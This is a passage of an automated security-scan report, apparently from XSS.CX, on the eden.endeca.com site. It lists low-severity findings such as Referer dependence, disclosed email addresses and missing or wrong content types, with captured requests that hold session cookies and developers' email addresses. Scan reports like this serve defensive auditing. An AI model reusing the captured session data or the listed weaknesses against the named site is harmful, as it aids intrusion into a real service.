Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.
Request 1
GET /web/eden/home HTTP/1.1Referer: http://eden.endeca.com/web/eden/home ;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.8.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com; COOKIE_SUPPORT=true
Response 1
HTTP/1.1 200 OK-5.5/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr"><head><title>endeca.com - User Profile</title><meta http-equiv="refresh" content="0;url=/web/guest/home"><script type='text/javascript' src='/dwr/interface/ECU.js?v=beta.2'></script><script type='text/javascript' src='/dwr/interface/EdenDWRUtils.js?v=beta.2'></script> <script type='text/javascript' src='/dwr/engine.js?v=beta.2'></script> <script type='text/javascript' src='/dwr/util.js?v=beta.2'></script><meta content="text/html; charset=UTF-8" http-equiv="content-type" /><link rel="Shortcut Icon" href="/html/themes/endeca_comp1/images/liferay.ico" /><link href="/c/portal/css_cached?themeId=endeca_comp1&colorSchemeId=04" type="text/css" rel="stylesheet" /><link href="/html/js/calendar/skins/aqua/theme.css" rel="stylesheet" type="text/css" /><style type="text/css">#p_p_id_EXT_PUBLIC_PROFILE_ {...[SNIP]...
Request 2
GET /web/eden/home HTTP/1.1;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.8.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com; COOKIE_SUPPORT=true
Response 2
HTTP/1.1 302 Moved Temporarily-5.5/portal/layout?p_l_id=PUB.1001.1&Bookmark=%2Fweb%2Feden%2Fhome
7. Email addresses disclosed
previous
next
There are 9 instances of this issue:
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
7.1. http://eden.endeca.com/c/portal/login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/c/portal/login
Issue detail
The following email addresses were disclosed in the response:default@endeca.com edenadmin@endeca.com
Request
GET /c/portal/login?tabs1=forgot-password HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com; COOKIE_SUPPORT=true
Response
HTTP/1.1 200 OK-5.5/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr"><head><title>endeca.com - Welcome</title><script type='text...[SNIP]... edenadmin@endeca.com ?subject=Password request email">...[SNIP]... -3430559-4");pageTracker._initData();pageTracker._setVar("default@endeca.com ");pageTracker._trackPageview();</script>...[SNIP]...
7.2. http://eden.endeca.com/html/js/calendar/calendar_stripped.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/html/js/calendar/calendar_stripped.js
Issue detail
The following email address was disclosed in the response:
Request
GET /html/js/calendar/calendar_stripped.js HTTP/1.1/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Response
HTTP/1.1 200 OK-5.5---------------------------------- * * The DHTML Calendar, version 1.0 "It is happening again" * * Details...[SNIP]... mihai_bazon@yahoo.com >...[SNIP]...
7.3. http://eden.endeca.com/html/js/jquery/cookie.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/html/js/jquery/cookie.js
Issue detail
The following email address was disclosed in the response:
Request
GET /html/js/jquery/cookie.js HTTP/1.1/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Response
HTTP/1.1 200 OK-5.5/licenses/mit-license.php * http://www.gnu.org/li...[SNIP]... klaus.hartl@stilbuero.de *//** * Get the value of a cookie with the given name. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String name The name of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { // name and value given, set cookie options = options || {}; var expires = ''; if (o...[SNIP]...
7.4. http://eden.endeca.com/html/js/jquery/dimensions.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/html/js/jquery/dimensions.js
Issue detail
The following email addresses were disclosed in the response:brandon.aaron@gmail.com paul.bakaus@googlemail.com
Request
GET /html/js/jquery/dimensions.js HTTP/1.1/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Response
HTTP/1.1 200 OK-5.5paul.bakaus@googlemail.com ) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net) * Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php) * and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses. * * $LastCha...[SNIP]...
7.5. http://eden.endeca.com/html/js/jquery/hover_intent.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/html/js/jquery/hover_intent.js
Issue detail
The following email address was disclosed in the response:
Request
GET /html/js/jquery/hover_intent.js HTTP/1.1/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Response
HTTP/1.1 200 OK-5.5...[SNIP]... brian@cherne.net >...[SNIP]...
7.6. http://eden.endeca.com/html/js/jquery/jeditable.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/html/js/jquery/jeditable.js
Issue detail
The following email address was disclosed in the response:
Request
GET /html/js/jquery/jeditable.js HTTP/1.1/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Response
HTTP/1.1 200 OK-5.5-----------------------------------------------+| Copyright (c) 2006-2007 Mika Tuupola, Dylan Verheul || All rights reserved. ...[SNIP]... dylan@dyve.net >...[SNIP]...
7.7. http://eden.endeca.com/html/js/jquery/tabs.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/html/js/jquery/tabs.js
Issue detail
The following email address was disclosed in the response:
Request
GET /html/js/jquery/tabs.js HTTP/1.1/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Response
HTTP/1.1 200 OK-5.5...[SNIP]... klaus.hartl@stilbuero.de */$.fn.tabs = function(initial, settings) { // settings if (typeof initial == 'object') settings = initial; // no initial tab given but a settings object settings = $.extend({ in...[SNIP]... klaus.hartl@stilbuero.de *//** * Disable a tab, so that clicking it has no effect. * * @example $('#container').disableTab(2); * @desc Disable the second tab of the tab interface contained in <div id="container">...[SNIP]... klaus.hartl@stilbuero.de *//** * Enable a tab that has been disabled. * * @example $('#container').enableTab(2); * @desc Enable the second tab of the tab interface contained in <div id="container">...[SNIP]... klaus.hartl@stilbuero.de */var tabEvents = ['triggerTab', 'disableTab', 'enableTab'];for (var i = 0; i < tabEvents.length; i++) { $.fn[tabEvents[i]] = (function(tabEvent) { return function(tab) { re...[SNIP]... klaus.hartl@stilbuero.de */$.fn.activeTab = function() { var selectedTabs = []; this.each(function() { var nav = $('ul.tabs-nav' , this); nav = nav.size() && nav || $('>...[SNIP]...
7.8. http://eden.endeca.com/web/eden/home
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/web/eden/home
Issue detail
The following email address was disclosed in the response:
Request
GET /web/eden/home HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/portal/login?tabs1=forgot-password;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.8.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com
Response
HTTP/1.1 200 OK-5.5/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr"><head><title>endeca.com - User Profile</title><meta http-eq...[SNIP]... -3430559-4");pageTracker._initData();pageTracker._setVar("default@endeca.com ");pageTracker._trackPageview();</script>...[SNIP]...
7.9. http://eden.endeca.com/web/guest/home
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/web/guest/home
Issue detail
The following email address was disclosed in the response:
Request
GET /web/guest/home HTTP/1.1/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.2.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com; COOKIE_SUPPORT=true
Response
HTTP/1.1 200 OK-5.5/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr"><head><title>endeca.com - Welcome</title><script type='text...[SNIP]... -3430559-4");pageTracker._initData();pageTracker._setVar("default@endeca.com ");pageTracker._trackPageview();</script>...[SNIP]...
8. HTML does not specify charset
previous
next
There are 2 instances of this issue:
Issue description
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1 .
8.1. http://eden.endeca.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/
Request
GET / HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.2.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com; COOKIE_SUPPORT=true
Response
HTTP/1.1 200 OK-5.5Content-Type: text/html :location.replace('/c')"></body></html>
8.2. http://eden.endeca.com/web/guest/home
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/web/guest/home
Request
GET /web/guest/home HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/about-us/company-overview.html;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK-5.5Content-Type: text/html ..................................................................................................................................................................................[SNIP]...
9. Content type incorrectly stated
previous
next
There are 3 instances of this issue:
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
9.1. http://eden.endeca.com/dwr/interface/ECU.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://eden.endeca.com
Path:
/dwr/interface/ECU.js
Issue detail
The response contains the following Content-type statement:The response states that it contains plain text . However, it actually appears to contain script .
Request
GET /dwr/interface/ECU.js?v=beta.2 HTTP/1.1/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Response
HTTP/1.1 200 OK-5.5Content-Type: text/plain ...[SNIP]...
9.2. http://eden.endeca.com/dwr/interface/EdenDWRUtils.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://eden.endeca.com
Path:
/dwr/interface/EdenDWRUtils.js
Issue detail
The response contains the following Content-type statement:The response states that it contains plain text . However, it actually appears to contain script .
Request
GET /dwr/interface/EdenDWRUtils.js?v=beta.2 HTTP/1.1/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Response
HTTP/1.1 200 OK-5.5Content-Type: text/plain ...[SNIP]...
9.3. http://eden.endeca.com/web/guest/home
previous
Summary
Severity:
Information
Confidence:
Firm
Host:
http://eden.endeca.com
Path:
/web/guest/home
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain AMF-encoded data .
Request
GET /web/guest/home HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/about-us/company-overview.html;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK-5.5Content-Type: text/html ..................................................................................................................................................................................[SNIP]...
10. Content type is not specified
previous
Summary
Severity:
Information
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/html/themes/endeca_comp1/images/liferay.ico
Issue description
If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
Request
GET /html/themes/endeca_comp1/images/liferay.ico HTTP/1.1;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.2.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com
Response
HTTP/1.1 200 OK-5.5........................................................................................|...G...+...0...P....[SNIP]...
Report generated by XSS.CX at Sat Oct 22 08:59:28 CDT 2011.